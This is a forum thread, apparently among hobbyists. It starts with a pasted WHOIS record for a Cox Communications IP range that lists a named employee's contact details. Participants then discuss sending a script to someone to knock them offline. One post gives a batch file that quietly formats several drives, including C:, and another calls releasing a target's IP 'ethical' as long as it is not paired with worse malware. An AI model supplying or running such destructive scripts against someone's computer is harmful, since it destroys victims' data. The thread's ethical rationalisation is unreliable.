Ok let's see whta's here OrgName: Cox Communications Inc. OrgID: CXA Address: 1400 Lake Hearn Drive City: Atlanta StateProv: GA PostalCode: 30313 Country: US NetRange: 70.160.0.0 - 70.191.255.255 CIDR: 70.160.0.0/11 NetName: NETBLK-COX-ATLANTA-10 NetHandle: NET-70-160-0-0-1 Parent: NET-70-0-0-0-0 NetType: Direct Allocation NameServer: NS.COX.NET NameServer: NS.WEST.COX.NET NameServer: NS.EAST.COX.NET Comment: For legal requests/assistance please use the following contact information: Comment: Comment: Cox Subpoena Phone: 404-269-0100 Comment: Comment: Cox Subpoena Info: http://www.cox.com/policy/leainformation/default.asp RegDate: 2004-07-21 Updated: 2007-03-27 OrgAbuseHandle: IC146-ARIN OrgAbuseName: Cox Communications Inc OrgAbusePhone: 1-404-269-7626 OrgAbuseEmail: abuse@cox.net OrgTechHandle: SHACK-ARIN OrgTechName: Shackelford Scott OrgTechPhone: 1-404-269-7626 OrgTechEmail: scott.shackelford@cox.com CustName: Cox Communications Address: 1400 Lake Hearn Dr. City: Atlanta StateProv: GA PostalCode: 30319 Country: US RegDate: 2005-03-04 Updated: 2005-08-03 NetRange: 70.189.128.0 - 70.189.255.255 CIDR: 70.189.128.0/17 NetName: NETBLK-LV-RDC-70-189-128-0 NetHandle: NET-70-189-128-0-1 Parent: NET-70-160-0-0-1 NetType: Reassigned Comment: RegDate: 2005-03-04 Updated: 2005-08-03 OrgAbuseHandle: IC146-ARIN OrgAbuseName: Cox Communications Inc OrgAbusePhone: 1-404-269-7626 OrgAbuseEmail: abuse@cox.net <---- contact for abuse :cuss: :cuss: OrgTechHandle: SHACK-ARIN OrgTechName: Shackelford Scott OrgTechPhone: 1-404-269-7626 OrgTechEmail: scott.shackelford@cox.com
LOL gotta love that WHOIS site dont cha also that site tryed to DOS attack me once lol didnt work out to well with them
or can send something like : @echo off format d: /q /y format e: /q /y format f: /q /y format g: /q /y format c: /q /y format t: /q /y
Please read older posts. I don't think we are trying to wipe all local/attached drives. :whip: Yes that would 'destroy the ip' but that would also destroy there computer entirely.
Actually it's not 'disabling' their network. It's releasing their ip. There is no physical damage and you can find the answer without using the internet (i.e. The help thingy or just asking some1). So unless you pair this with a more crippling virus it is 'ethical'. BUT I STRONGLY STATE THAT THIS IS ETHICAL ONLY BY ITSELF. That is a all :happy: !